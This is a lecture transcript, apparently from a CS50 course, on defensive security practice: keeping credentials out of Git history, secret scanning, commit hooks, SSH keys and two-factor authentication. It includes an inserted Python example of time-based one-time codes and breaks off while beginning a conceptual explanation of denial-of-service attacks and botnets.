1 00:00:00,000 --> 00:00:17,213 2 00:00:17,213 --> 00:00:20,380 DOUG LLOYD: Now that we know a bit more about the internet and how it works, 3 00:00:20,380 --> 00:00:23,200 let's reintroduce the subject of security with this new context. 4 00:00:23,200 --> 00:00:26,100 And let's start by talking about Git and GitHub. 5 00:00:26,100 --> 00:00:28,540 Recall that Git and GitHub are a technology that 6 00:00:28,540 --> 00:00:31,990 are used by programmers to version control 7 00:00:31,990 --> 00:00:34,690 their software, which basically allows them the ability 8 00:00:34,690 --> 00:00:39,010 to save code to an internet-based repository in case of some failure 9 00:00:39,010 --> 00:00:41,830 locally, they have a backup place to put it, but also 10 00:00:41,830 --> 00:00:43,750 keep track of all the changes they've made 11 00:00:43,750 --> 00:00:46,120 and possibly go back in time in case they produce 12 00:00:46,120 --> 00:00:48,460 a version of code that is broken. 13 00:00:48,460 --> 00:00:50,440 GitHub has some great advantages, but it also 14 00:00:50,440 --> 00:00:53,110 has the potential disadvantages because of this structure 15 00:00:53,110 --> 00:00:54,590 of being able to go back in time. 16 00:00:54,590 --> 00:00:58,180 So for example, imagine that what we have is an initial commit, and commit 17 00:00:58,180 --> 00:01:01,828 is just GitHub parlance for a set of code 18 00:01:01,828 --> 00:01:03,370 that you are sending to the internet. 19 00:01:03,370 --> 00:01:07,720 So I've decided to take file A, file B, and file C in their current versions. 20 00:01:07,720 --> 00:01:12,190 I've saved them using control S or command S literally on my machine, 21 00:01:12,190 --> 00:01:14,800 and I want to send those versions to GitHub to be 22 00:01:14,800 --> 00:01:17,410 stored permanently or semi-permanently. 
23 00:01:17,410 --> 00:01:19,900 You would package those up in what's called a commit 24 00:01:19,900 --> 00:01:23,560 and then push that code to GitHub where it would then be visible online. 25 00:01:23,560 --> 00:01:25,270 And this would be packaged as a commit. 26 00:01:25,270 --> 00:01:29,860 And all the files that we view on GitHub are tracked in terms of commits. 27 00:01:29,860 --> 00:01:31,450 And commits chain together. 28 00:01:31,450 --> 00:01:34,210 And we've seen this idea of chaining in the past when we've 29 00:01:34,210 --> 00:01:36,600 discussed linked lists, for example. 30 00:01:36,600 --> 00:01:39,100 So every commit knows about the one that comes after it once 31 00:01:39,100 --> 00:01:43,810 that commit is eventually pushed as well as all of the ones that preceded it. 32 00:01:43,810 --> 00:01:47,110 So imagine we have an initial commit where we post some code 33 00:01:47,110 --> 00:01:49,870 and then we write some more-- we make some more changes. 34 00:01:49,870 --> 00:01:52,510 We perhaps update our database in such a way 35 00:01:52,510 --> 00:01:57,790 where when we post or push-- excuse me-- our second commit to GitHub, 36 00:01:57,790 --> 00:02:00,460 we accidentally expose the database credentials. 37 00:02:00,460 --> 00:02:03,250 So perhaps someone inadvertently typed the password 38 00:02:03,250 --> 00:02:06,760 for how to access the database into some Python code that would then 39 00:02:06,760 --> 00:02:09,639 be used to access that database. 40 00:02:09,639 --> 00:02:10,930 That's not a good thing. 41 00:02:10,930 --> 00:02:13,833 And maybe somebody quickly realized it and said, you know what? 42 00:02:13,833 --> 00:02:15,250 We need to get this off of GitHub. 43 00:02:15,250 --> 00:02:16,570 It is a source repository. 44 00:02:16,570 --> 00:02:17,920 It's available online. 45 00:02:17,920 --> 00:02:22,390 And so they push a third commit to GitHub that deletes those credentials.
46 00:02:22,390 --> 00:02:26,740 It stores them somewhere else that's not going to be saved on this repository. 47 00:02:26,740 --> 00:02:29,977 But have we actually solved the problem? 48 00:02:29,977 --> 00:02:31,810 And you can probably imagine that the answer 49 00:02:31,810 --> 00:02:34,930 is no, because we have this idea of version control 50 00:02:34,930 --> 00:02:39,700 where every past iteration of all of these files 51 00:02:39,700 --> 00:02:43,840 is stored still on GitHub such that, if I needed to, I could go back in time. 52 00:02:43,840 --> 00:02:48,220 So even though I attempted to solve the security crisis I just 53 00:02:48,220 --> 00:02:52,360 created for myself by introducing a new commit that 54 00:02:52,360 --> 00:02:54,520 removes the credentials from those files such that, 55 00:02:54,520 --> 00:02:57,070 if I'm looking just at the most recent version of the files, 56 00:02:57,070 --> 00:02:58,147 I don't see it anymore. 57 00:02:58,147 --> 00:02:59,980 I still have the ability to go back in time, 58 00:02:59,980 --> 00:03:03,790 so this doesn't actually solve a problem. 59 00:03:03,790 --> 00:03:05,800 See, one of the interesting things about GitHub 60 00:03:05,800 --> 00:03:08,230 is the model that is used for it. 61 00:03:08,230 --> 00:03:10,120 At the very beginning of GitHub's existence, 62 00:03:10,120 --> 00:03:14,260 it relied pretty extensively on this idea of you sign up for free, 63 00:03:14,260 --> 00:03:16,030 you get a free account for GitHub, and you 64 00:03:16,030 --> 00:03:20,170 have a limited number of private repositories, repositories that are not 65 00:03:20,170 --> 00:03:24,250 publicly viewable or searchable, and you could pay to have more of them 66 00:03:24,250 --> 00:03:25,930 if you wanted to. 
67 00:03:25,930 --> 00:03:29,650 But the majority of your repositories, assuming 68 00:03:29,650 --> 00:03:33,610 you did not opt into a paid account, were public, which 69 00:03:33,610 --> 00:03:37,720 meant anybody on the internet could search them using GitHub's search tool, 70 00:03:37,720 --> 00:03:40,600 or using even a regular search engine such as Google, 71 00:03:40,600 --> 00:03:42,790 could just look for something. 72 00:03:42,790 --> 00:03:46,990 And if your GitHub repositories happen to match what that person searched 73 00:03:46,990 --> 00:03:49,660 or specifically, if you're looking within GitHub's search feature, 74 00:03:49,660 --> 00:03:52,620 if a user is looking for specific lines of code, 75 00:03:52,620 --> 00:03:56,138 anything in a public repository, it is available. 76 00:03:56,138 --> 00:03:58,180 Now, GitHub has recently changed to a model where 77 00:03:58,180 --> 00:04:01,720 there are more private repo-- or there's a higher limit 78 00:04:01,720 --> 00:04:04,840 on the number of private repositories that somebody could have. 79 00:04:04,840 --> 00:04:10,090 But this was part of GitHub's design to really encourage 80 00:04:10,090 --> 00:04:13,780 developers and programmers to sort of create this open source community where 81 00:04:13,780 --> 00:04:18,310 anybody could view someone else's code, and in GitHub parlance, 82 00:04:18,310 --> 00:04:21,670 fork their code, which basically means to take their entire repository 83 00:04:21,670 --> 00:04:26,830 or collection of files and copy it into their own GitHub repository 84 00:04:26,830 --> 00:04:29,760 to perhaps make changes or suggest changes, 85 00:04:29,760 --> 00:04:33,040 pushing those back into the code base with the idea being 86 00:04:33,040 --> 00:04:35,810 that it would make the entire community better.
87 00:04:35,810 --> 00:04:38,680 A side effect, of course, is that items get 88 00:04:38,680 --> 00:04:43,360 revealed when we do so because of this public repository setup we have here. 89 00:04:43,360 --> 00:04:47,200 So GitHub is great in terms of its ability for programmers 90 00:04:47,200 --> 00:04:49,930 to refer to materials on the internet. 91 00:04:49,930 --> 00:04:52,750 They don't have to rely on their own local machines to store code. 92 00:04:52,750 --> 00:04:57,070 It allows people to work from multiple workstations, 93 00:04:57,070 --> 00:04:59,590 similar to how Dropbox or Google Drive, for example, 94 00:04:59,590 --> 00:05:02,470 might allow you to access files from different machines. 95 00:05:02,470 --> 00:05:04,970 You don't have to be on a specific machine to access a file, 96 00:05:04,970 --> 00:05:08,500 as we used to have to do before these cloud-based document storage 97 00:05:08,500 --> 00:05:10,060 services existed. 98 00:05:10,060 --> 00:05:12,310 And it encourages collaboration. 99 00:05:12,310 --> 00:05:16,390 For example, if you and I were to collaborate on a GitHub repository, 100 00:05:16,390 --> 00:05:20,000 I could push changes to that repository that you could then pull. 101 00:05:20,000 --> 00:05:22,750 And we could then be working off of the same code base again. 102 00:05:22,750 --> 00:05:25,690 We sort of have this central repo-- 103 00:05:25,690 --> 00:05:28,630 central area where we share our code with one another. 104 00:05:28,630 --> 00:05:30,580 And we can each individually make changes 105 00:05:30,580 --> 00:05:33,520 and incorporate one another's changes into the final products. 106 00:05:33,520 --> 00:05:38,110 So we're always working off of the same base of material. 
107 00:05:38,110 --> 00:05:40,210 The side effect, though, again, is this material 108 00:05:40,210 --> 00:05:44,260 is generally public unless you have opted into a private repository where 109 00:05:44,260 --> 00:05:46,450 you have specific individuals who are logged 110 00:05:46,450 --> 00:05:49,990 in with their GitHub accounts who want to share. 111 00:05:49,990 --> 00:05:52,420 So is there a way to solve this problem, though, of we 112 00:05:52,420 --> 00:05:55,087 accidentally expose our credentials in a public repository? 113 00:05:55,087 --> 00:05:56,920 Of course, if we're in a private repository, 114 00:05:56,920 --> 00:05:58,220 this might not be as alarming. 115 00:05:58,220 --> 00:05:59,920 It's still probably not something you-- 116 00:05:59,920 --> 00:06:03,130 it should be encouraged to have credentials 117 00:06:03,130 --> 00:06:07,480 for anything stored anywhere, whether public or private, on the internet. 118 00:06:07,480 --> 00:06:08,830 It's a little riskier. 119 00:06:08,830 --> 00:06:12,402 But is there a way to get rid of this or to prevent this problem from happening? 120 00:06:12,402 --> 00:06:14,860 And fortunately, there are a number of different safeguards 121 00:06:14,860 --> 00:06:17,680 specific to Git and GitHub that we can use 122 00:06:17,680 --> 00:06:22,240 to prevent the accidental leakage of information, so to speak. 123 00:06:22,240 --> 00:06:25,330 So for example, one way we can handle this is using a program or utility 124 00:06:25,330 --> 00:06:27,340 called GitSecrets. 125 00:06:27,340 --> 00:06:31,000 GitSecrets works by looking for what's called a regular expression. 126 00:06:31,000 --> 00:06:33,640 And a regular expression is computer science parlance 127 00:06:33,640 --> 00:06:37,600 for a particular formation of a string, so a certain number 128 00:06:37,600 --> 00:06:41,360 of characters, a certain number of digit characters, maybe some punctuation 129 00:06:41,360 --> 00:06:41,860 marks. 
130 00:06:41,860 --> 00:06:46,360 You can say, I'm looking for strings that match this idea. 131 00:06:46,360 --> 00:06:49,630 And you can express this idea where this idea is all capital 132 00:06:49,630 --> 00:06:52,900 letters, all lowercase letters, this many numbers, and this many punctuation 133 00:06:52,900 --> 00:06:55,750 marks, and so on using this tool called a regular expression. 134 00:06:55,750 --> 00:06:59,410 But GitSecrets contains a list of these regular expressions 135 00:06:59,410 --> 00:07:02,710 and will warn you when you are about to make a commit, when you're 136 00:07:02,710 --> 00:07:05,650 about to push code or send code to GitHub to be stored 137 00:07:05,650 --> 00:07:10,030 in its online repository that you have a string that matches this pattern 138 00:07:10,030 --> 00:07:11,950 that you wanted me to warn you about. 139 00:07:11,950 --> 00:07:15,190 And so be sure before you commit this code 140 00:07:15,190 --> 00:07:19,600 and push this code that you actually intend to send this up 141 00:07:19,600 --> 00:07:23,380 to GitHub, because it may be that this matches a password string that you're 142 00:07:23,380 --> 00:07:24,560 trying to avoid. 143 00:07:24,560 --> 00:07:27,580 So that's an interesting tool that can be used for that. 144 00:07:27,580 --> 00:07:31,150 You also want to consider limiting third party app access. 145 00:07:31,150 --> 00:07:35,930 GitHub accounts are actually very common to use as other forms of login, 146 00:07:35,930 --> 00:07:36,770 for example. 147 00:07:36,770 --> 00:07:39,190 So there's a platform on the internet called 148 00:07:39,190 --> 00:07:42,190 OAuth which allows you to use, for example, your Facebook 149 00:07:42,190 --> 00:07:44,977 account or your Google account to log into other services. 150 00:07:44,977 --> 00:07:47,560 Perhaps you've encountered this in your own experience working 151 00:07:47,560 --> 00:07:49,510 with different services on the internet. 
152 00:07:49,510 --> 00:07:54,010 Instead of creating a login for site x, you could use your Facebook or Google 153 00:07:54,010 --> 00:07:58,150 login, or, in many instances as well, your GitHub login to do so. 154 00:07:58,150 --> 00:08:01,610 When you do so, though, you are allowing that third party application, 155 00:08:01,610 --> 00:08:07,090 someone that's not GitHub, the ability to use and access your GitHub identity 156 00:08:07,090 --> 00:08:08,120 or credential. 157 00:08:08,120 --> 00:08:12,640 And so you should be very careful with not only GitHub but other services 158 00:08:12,640 --> 00:08:17,560 as well, thinking about whether you want that other service to have access 159 00:08:17,560 --> 00:08:21,940 to your GitHub, or Facebook, or Google account information to use it even just 160 00:08:21,940 --> 00:08:23,380 for authentication. 161 00:08:23,380 --> 00:08:26,320 It's a good idea to try and limit how much third party app 162 00:08:26,320 --> 00:08:30,340 access you're giving to other services. 163 00:08:30,340 --> 00:08:33,520 Another tool is to use something called a commit hook. 164 00:08:33,520 --> 00:08:36,460 Now, commit hook is just a fancy term for a short program 165 00:08:36,460 --> 00:08:42,070 or set of instructions that executes when a commit is pushed to GitHub. 166 00:08:42,070 --> 00:08:44,740 So for example, many of the course websites 167 00:08:44,740 --> 00:08:48,490 that we use here at Harvard for CS50 are GitHub-based, 168 00:08:48,490 --> 00:08:52,030 which means that when we want to change the content on the course website, 169 00:08:52,030 --> 00:08:56,350 we update some HTML, or Python, or JavaScript files, we push those 170 00:08:56,350 --> 00:09:01,000 to GitHub, and that triggers a commit hook where basically that commit 171 00:09:01,000 --> 00:09:04,570 hook copies those files into our web server, 172 00:09:04,570 --> 00:09:07,420 runs some tests on them to make sure that there's no errors in them.
173 00:09:07,420 --> 00:09:10,390 For example, if we wrote some JavaScript or Python that was breaking, 174 00:09:10,390 --> 00:09:15,250 it had a bug in it, we'd rather not deploy that bug so to speak. 175 00:09:15,250 --> 00:09:17,710 We wouldn't want the broken version of the code 176 00:09:17,710 --> 00:09:21,190 to replace the currently working website. 177 00:09:21,190 --> 00:09:23,750 And so commit hook can be used to do testing as well. 178 00:09:23,750 --> 00:09:26,170 And then once all the tests pass, we then 179 00:09:26,170 --> 00:09:28,300 are able to activate those files on the web server 180 00:09:28,300 --> 00:09:29,890 and the changes have happened. 181 00:09:29,890 --> 00:09:32,530 So we're using GitHub to store the changes 182 00:09:32,530 --> 00:09:35,650 that we want to make on our site, the HTML, the Python, 183 00:09:35,650 --> 00:09:37,870 the JavaScript changes that we want to make. 184 00:09:37,870 --> 00:09:41,650 And then we're using this commit hook, a set of instructions, 185 00:09:41,650 --> 00:09:45,340 to copy them over and actually deploy those changes to the website 186 00:09:45,340 --> 00:09:48,430 once we've verified that we haven't made anything break. 187 00:09:48,430 --> 00:09:52,210 You can also use commit hooks, for example, to check for passwords 188 00:09:52,210 --> 00:09:56,830 and have it warn you if you have perhaps leaked a credential. 189 00:09:56,830 --> 00:10:00,040 And then you can undo that with a technique 190 00:10:00,040 --> 00:10:02,480 that we'll see in just a moment. 191 00:10:02,480 --> 00:10:06,250 Another thing that you can do when using GitHub to protect or verify 192 00:10:06,250 --> 00:10:09,180 your identity is to use an SSH key. 193 00:10:09,180 --> 00:10:12,653 SSH keys are a special form of a public and private key. 194 00:10:12,653 --> 00:10:15,070 In this case, it's really not used for encryption, though. 195 00:10:15,070 --> 00:10:17,535 It's actually used as identification. 
196 00:10:17,535 --> 00:10:19,410 And so this idea of digital signatures, which 197 00:10:19,410 --> 00:10:22,860 you may recall from a few lectures ago, comes back into play. 198 00:10:22,860 --> 00:10:27,600 Whenever I use an SSH key to push my code to GitHub, what happens 199 00:10:27,600 --> 00:10:33,150 is I also digitally sign the commit when I send it up. 200 00:10:33,150 --> 00:10:36,870 And so before that commit gets posted to GitHub, 201 00:10:36,870 --> 00:10:40,200 GitHub verifies this by checking my public key 202 00:10:40,200 --> 00:10:43,230 and verifying, using the mathematics that we've seen in the past, 203 00:10:43,230 --> 00:10:46,650 that, yes, only Doug could have sent this to me 204 00:10:46,650 --> 00:10:53,160 because only Doug's public key will unscramble this set of zeros and ones 205 00:10:53,160 --> 00:10:57,180 that I received that only could have then been created by his private key. 206 00:10:57,180 --> 00:10:59,550 These two things are reciprocal of one another. 207 00:10:59,550 --> 00:11:01,980 So we can use SSH keys and digital signatures 208 00:11:01,980 --> 00:11:05,850 as an identity verification scheme as well for GitHub 209 00:11:05,850 --> 00:11:08,430 as we might be able to for mailing documents, or sending 210 00:11:08,430 --> 00:11:11,160 documents, or something like that. 211 00:11:11,160 --> 00:11:15,300 Now, imagine we have posted the credentials accidentally. 212 00:11:15,300 --> 00:11:17,130 Is there a way to get rid of them? 213 00:11:17,130 --> 00:11:18,930 GitHub does track our entire history. 214 00:11:18,930 --> 00:11:20,430 But what if we do make a mistake? 215 00:11:20,430 --> 00:11:22,410 Human beings are fallible. 216 00:11:22,410 --> 00:11:25,980 And so there is a way to actually eliminate the history. 217 00:11:25,980 --> 00:11:29,697 And that is using a command called Git Rebase. 
218 00:11:29,697 --> 00:11:32,280 So let's go back to the illustration we had a moment ago where 219 00:11:32,280 --> 00:11:34,250 we have several different commits. 220 00:11:34,250 --> 00:11:37,210 And I've added a fourth commit here just for purposes of illustration. 221 00:11:37,210 --> 00:11:38,960 So our first commit and our second commit, 222 00:11:38,960 --> 00:11:42,180 and then it's after that that we expose the credentials accidentally, 223 00:11:42,180 --> 00:11:47,010 and then we have a fourth commit where we actually delete that mistake that we 224 00:11:47,010 --> 00:11:48,300 had previously made. 225 00:11:48,300 --> 00:11:51,810 When we want to Git Rebase, the idea is we want 226 00:11:51,810 --> 00:11:54,370 to delete a portion of the history. 227 00:11:54,370 --> 00:11:56,120 Now, deleting a portion of the history has 228 00:11:56,120 --> 00:11:59,075 a side effect of any changes that I made here or here. 229 00:11:59,075 --> 00:12:01,950 In this illustration, we're going to get rid of the last two commits. 230 00:12:01,950 --> 00:12:05,460 Any changes that I've made besides accidentally exposing the credentials 231 00:12:05,460 --> 00:12:07,170 are also going to be destroyed. 232 00:12:07,170 --> 00:12:11,220 And so it's going to be incumbent on us to make sure to copy and save 233 00:12:11,220 --> 00:12:15,150 the changes we actually want to preserve in case we've done more than just 234 00:12:15,150 --> 00:12:16,530 expose the credentials. 235 00:12:16,530 --> 00:12:19,170 And then we'll have to make a new commit in this new history 236 00:12:19,170 --> 00:12:23,100 we create so that we can still preserve those changes that we want to make. 237 00:12:23,100 --> 00:12:25,620 But let's say, other than the credentials, 238 00:12:25,620 --> 00:12:27,900 I didn't actually do anything else. 
239 00:12:27,900 --> 00:12:33,330 One thing I could do is rebase or set as a new start point, basically, 240 00:12:33,330 --> 00:12:36,190 this second commit as the end of the chain. 241 00:12:36,190 --> 00:12:40,590 So instead of going all the way to here and having that preserved ad infinitum, 242 00:12:40,590 --> 00:12:44,430 I want to just get rid of everything from the second commit forward. 243 00:12:44,430 --> 00:12:45,300 And I can do that. 244 00:12:45,300 --> 00:12:49,110 And then those commits are no longer remembered by GitHub. 245 00:12:49,110 --> 00:12:52,110 And as soon as the next commit I have would go here, 246 00:12:52,110 --> 00:12:56,760 right after second commit as opposed to imagining a fifth one there 247 00:12:56,760 --> 00:12:59,580 right after credentials being removed, those commits 248 00:12:59,580 --> 00:13:03,570 are, for all intents and purposes on GitHub, forgotten. 249 00:13:03,570 --> 00:13:06,330 And finally, one more thing that we can do when using GitHub 250 00:13:06,330 --> 00:13:09,420 is to mandate the use of two-factor authentication. 251 00:13:09,420 --> 00:13:12,810 Recall we've discussed two-factor authentication a little bit previously. 252 00:13:12,810 --> 00:13:16,890 And the idea is that you have a backup mechanism 253 00:13:16,890 --> 00:13:19,650 to prevent unauthorized login. 254 00:13:19,650 --> 00:13:21,720 And the two factors in two-factor authentication 255 00:13:21,720 --> 00:13:26,520 are not two passwords, because those are fundamentally quite similar. 256 00:13:26,520 --> 00:13:29,850 The idea is that you want to have something that you know, for example, 257 00:13:29,850 --> 00:13:33,150 a password-- that's usually very commonly one of the two factors 258 00:13:33,150 --> 00:13:35,220 in two-factor authentication-- 259 00:13:35,220 --> 00:13:37,590 and something that you have, the thought being 260 00:13:37,590 --> 00:13:42,900 that an adversary is incredibly unlikely to have both things at the same time. 
261 00:13:42,900 --> 00:13:45,120 They may know your password, but they probably 262 00:13:45,120 --> 00:13:49,320 don't have your cell phone, for example, or your RSA key. 263 00:13:49,320 --> 00:13:54,360 They may have stolen your phone or they may have stolen your RSA key, 264 00:13:54,360 --> 00:13:57,390 but they probably don't also know your password. 265 00:13:57,390 --> 00:14:00,690 And so the idea is that this provides an additional level of defense 266 00:14:00,690 --> 00:14:04,080 against potential hacking, or breaking into accounts, 267 00:14:04,080 --> 00:14:06,660 or unauthorized behavior in accounts that you obviously 268 00:14:06,660 --> 00:14:08,190 don't want to happen. 269 00:14:08,190 --> 00:14:11,562 Now, an RSA key, if you're unfamiliar, is something that looks like this. 270 00:14:11,562 --> 00:14:13,020 There's different versions of them. 271 00:14:13,020 --> 00:14:14,437 They've sort of evolved over time. 272 00:14:14,437 --> 00:14:18,660 This one is actually a combined RSA key and USB drive. 273 00:14:18,660 --> 00:14:22,020 And inside the window here of the RSA key 274 00:14:22,020 --> 00:14:26,010 is a six digit number that just changes every 60 seconds or so. 275 00:14:26,010 --> 00:14:28,900 So when you are given one of these, for example, 276 00:14:28,900 --> 00:14:32,310 perhaps at a firm or a business, it is assigned to you specifically. 277 00:14:32,310 --> 00:14:35,530 There's a server that your IT team will have 278 00:14:35,530 --> 00:14:39,960 set up that maps the serial number on the back of this RSA key 279 00:14:39,960 --> 00:14:42,120 to your employee ID, for example. 280 00:14:42,120 --> 00:14:47,010 But they otherwise don't know what the number currently on the RSA key is. 281 00:14:47,010 --> 00:14:51,840 They only know who owns it, who is physically in possession of it, which 282 00:14:51,840 --> 00:14:53,210 employee ID it maps to.
283 00:14:53,210 --> 00:14:54,990 And every 60 seconds it changes according 284 00:14:54,990 --> 00:14:59,430 to some mathematical algorithm that is built into the key that generates 285 00:14:59,430 --> 00:15:02,190 numbers in a pseudo random way. 286 00:15:02,190 --> 00:15:05,490 And after 60 seconds, that code will change into something else. 287 00:15:05,490 --> 00:15:10,130 And you'll need to actually have the key on you to complete a login. 288 00:15:10,130 --> 00:15:12,810 If an RSA key is being used to secure such 289 00:15:12,810 --> 00:15:15,483 that you need to enter a password and your RSA key value, 290 00:15:15,483 --> 00:15:16,650 you would need to have both. 291 00:15:16,650 --> 00:15:19,872 No other employee RSA key-- well, hypothetically, I 292 00:15:19,872 --> 00:15:21,830 guess there's a one in a million chance that it 293 00:15:21,830 --> 00:15:24,705 would happen to be randomly showing the same number at the same time. 294 00:15:24,705 --> 00:15:28,100 But no other employee's RSA key could be used to log in. 295 00:15:28,100 --> 00:15:30,690 Only yours could be used to log in. 296 00:15:30,690 --> 00:15:32,690 Now, there are several different tools out there 297 00:15:32,690 --> 00:15:35,810 that can be used to provide two-factor authentication services. 298 00:15:35,810 --> 00:15:39,628 And there's really no technical reason not to use these services. 299 00:15:39,628 --> 00:15:42,170 You'll find them as applications on cell phones, most likely. 300 00:15:42,170 --> 00:15:46,310 And you'll find ones like this, Google Authenticator, Authy, Duo Mobile. 301 00:15:46,310 --> 00:15:47,360 There are lots of others. 302 00:15:47,360 --> 00:15:50,390 And if you don't want to use one of those applications specifically, 303 00:15:50,390 --> 00:15:53,210 many services also just allow you to receive a text message 304 00:15:53,210 --> 00:15:54,902 from the service itself. 
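To make the idea of a code that changes on a timer more concrete, here is a minimal sketch of the open time-based one-time password scheme (TOTP, RFC 6238) that many authenticator apps use. It is not a description of how the hardware RSA key shown here works internally, since that device uses its own algorithm. The function name `totp` and its parameters are chosen for illustration, and the 30-second default step comes from the RFC rather than from the lecture.

```python
import hashlib
import hmac
import struct


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """Derive a time-based one-time code from a shared secret (RFC 6238, SHA-1)."""
    # Both sides count how many whole time steps have elapsed.
    counter = unix_time // step
    # HMAC the 8-byte big-endian counter with the shared secret.
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    # Dynamic truncation: the low 4 bits of the last byte select a 4-byte window.
    offset = digest[-1] & 0x0F
    value = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    # Keep only the requested number of decimal digits, left-padded with zeros.
    return str(value % 10 ** digits).zfill(digits)


# Test vector from RFC 6238, Appendix B: prints 94287082
print(totp(b"12345678901234567890", 59, digits=8))
```

The server and the device each hold the same secret and the same clock, so they can compute the same code independently. Nothing needs to be sent to the device at login time.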
305 00:15:54,902 --> 00:15:56,860 And you'll just get that via SMS on your phone, 306 00:15:56,860 --> 00:16:00,470 so still on your phone, just not tied to a specific application. 307 00:16:00,470 --> 00:16:05,690 And while there's no technical reason to avoid two-factor authentication, 308 00:16:05,690 --> 00:16:08,600 there is sort of this social friction surrounding 309 00:16:08,600 --> 00:16:13,580 two-factor authentication in that human beings tend to find it annoying, right? 310 00:16:13,580 --> 00:16:15,860 It used to be username, password, you're logged in. 311 00:16:15,860 --> 00:16:16,920 It's pretty quick. 312 00:16:16,920 --> 00:16:19,630 Now it's username, password, you get brought to another screen, 313 00:16:19,630 --> 00:16:22,880 you're asked to enter a six-digit code, or maybe in some advanced applications 314 00:16:22,880 --> 00:16:26,390 you get a push notification sent to your device that you have to unlock 315 00:16:26,390 --> 00:16:28,970 and then hit OK on the device. 316 00:16:28,970 --> 00:16:31,280 And people just find that inconvenient. 317 00:16:31,280 --> 00:16:34,400 We haven't yet reached this point culturally 318 00:16:34,400 --> 00:16:39,440 where two-factor authentication is the norm. 319 00:16:39,440 --> 00:16:43,610 And so it's sort of a linchpin when we talk about security 320 00:16:43,610 --> 00:16:49,400 in the internet context, is human beings being the limiting factor 321 00:16:49,400 --> 00:16:51,980 for how secure we can be. 322 00:16:51,980 --> 00:16:56,810 We have the technology to take steps to protect ourselves, 323 00:16:56,810 --> 00:16:59,360 but we don't feel compelled to do so. 324 00:16:59,360 --> 00:17:03,260 And we'll see this pattern reemerge in a few other places today. 325 00:17:03,260 --> 00:17:06,315 But just know that that is why perhaps you're 326 00:17:06,315 --> 00:17:08,690 not seeing so much adoption of two-factor authentication. 
327 00:17:08,690 --> 00:17:11,480 It's not that it's technically infeasible to do so. 328 00:17:11,480 --> 00:17:14,900 It's just that we just find it annoying to do so, 329 00:17:14,900 --> 00:17:19,401 and so we don't adopt it as aggressively as perhaps we should. 330 00:17:19,401 --> 00:17:21,109 Now let's discuss the type of attack that 331 00:17:21,109 --> 00:17:24,109 occurs on the internet with unfortunate regularity, 332 00:17:24,109 --> 00:17:27,270 and that is the idea of a denial of service attack. 333 00:17:27,270 --> 00:17:29,450 Now, the idea behind these attacks is basically 334 00:17:29,450 --> 00:17:32,000 to cripple the infrastructure of a website. 335 00:17:32,000 --> 00:17:34,460 Now, the reason for this might be financial. 336 00:17:34,460 --> 00:17:36,050 You want to try and sabotage somebody. 337 00:17:36,050 --> 00:17:39,380 There might be other motivations, distraction, for example, 338 00:17:39,380 --> 00:17:42,380 by tying up their resources, trying to stop the attack. 339 00:17:42,380 --> 00:17:44,510 It opens up another avenue to do something else, 340 00:17:44,510 --> 00:17:46,077 to perhaps steal information. 341 00:17:46,077 --> 00:17:48,410 There's many different motivations for why they do this. 342 00:17:48,410 --> 00:17:51,020 And some of them are honestly just boredom or fun. 343 00:17:51,020 --> 00:17:54,140 Amateur hackers sometimes think it's fun to just initiate 344 00:17:54,140 --> 00:17:57,110 a denial of service attack against an entity that 345 00:17:57,110 --> 00:17:59,870 is not prepared to handle it. 346 00:17:59,870 --> 00:18:02,480 Now, in the associated materials for this course, 347 00:18:02,480 --> 00:18:06,380 we provided an article called Making Cyberspace Safe for Democracy, which 348 00:18:06,380 --> 00:18:08,870 we really do encourage you to take a look at, read, 349 00:18:08,870 --> 00:18:10,597 and discuss with your group. 
350 00:18:10,597 --> 00:18:12,680 But I also want to take a little bit of time right 351 00:18:12,680 --> 00:18:15,590 now just to talk about this article in particular 352 00:18:15,590 --> 00:18:18,680 and draw your attention to some areas of concern 353 00:18:18,680 --> 00:18:21,710 or some areas that might lead to more discussion. 354 00:18:21,710 --> 00:18:25,070 Now, the biggest of these is these attacks 355 00:18:25,070 --> 00:18:28,875 tend not to be taken very seriously by people when they hear about them. 356 00:18:28,875 --> 00:18:31,250 You'll occasionally hear about these attacks in the news, 357 00:18:31,250 --> 00:18:33,350 denial of service attacks, or their cousin, 358 00:18:33,350 --> 00:18:35,930 distributed denial of service attacks. 359 00:18:35,930 --> 00:18:39,800 But culturally, again, us being humans and sort 360 00:18:39,800 --> 00:18:42,650 of neglecting some of the real security concerns here, 361 00:18:42,650 --> 00:18:44,420 we don't think of it as an attack. 362 00:18:44,420 --> 00:18:48,740 And that's maybe because of how we hear about other kinds of attacks 363 00:18:48,740 --> 00:18:52,340 on the news that seem more physically devastating, 364 00:18:52,340 --> 00:18:55,310 that have more real consequences. 365 00:18:55,310 --> 00:19:00,860 And it makes it hard to have a serious conversation about cyber attacks 366 00:19:00,860 --> 00:19:06,650 because there's this friction that we face trying to get people to understand 367 00:19:06,650 --> 00:19:08,600 that these are meaningful and real. 368 00:19:08,600 --> 00:19:12,530 And in particular, these attacks are kind of insidious. 369 00:19:12,530 --> 00:19:17,355 They're really easy to execute without much difficulty at all, 370 00:19:17,355 --> 00:19:20,480 especially against a small business that might be running its own server as 371 00:19:20,480 --> 00:19:22,640 opposed to relying on a cloud service. 
372 00:19:22,640 --> 00:19:29,150 A pretty top-of-the-line, commercially available machine might be able 373 00:19:29,150 --> 00:19:33,200 to execute a denial of service or DoS attack on its own. 374 00:19:33,200 --> 00:19:37,310 It doesn't even require exceptional resources. 375 00:19:37,310 --> 00:19:41,450 Now, when we start to attack mid-sized companies, or larger companies 376 00:19:41,450 --> 00:19:45,110 or entities, one single computer from one single IP address 377 00:19:45,110 --> 00:19:47,480 is not typically going to be enough. 378 00:19:47,480 --> 00:19:52,730 And so instead, you would have a distributed denial of service attack. 379 00:19:52,730 --> 00:19:54,620 In a distributed denial of service attack, 380 00:19:54,620 --> 00:19:58,070 there is still generally one core hacker, or one collective group 381 00:19:58,070 --> 00:19:59,960 of hackers or adversaries that are trying 382 00:19:59,960 --> 00:20:03,647 to penetrate some company's defenses. 383 00:20:03,647 --> 00:20:05,480 But they can't do it with their own machine. 384 00:20:05,480 --> 00:20:08,210 And so what they do is create something called a botnet. 385 00:20:08,210 --> 00:20:09,890 Perhaps you've heard this term before. 386 00:20:09,890 --> 00:20:12,590 A botnet basically happens, or is created, 387 00:20:12,590 --> 00:20:17,103 when hackers or adversaries distribute worms or viruses sort of 388 00:20:17,103 --> 00:20:17,770 surreptitiously. 389 00:20:17,770 --> 00:20:19,700 Perhaps they packaged them into some download. 390 00:20:19,700 --> 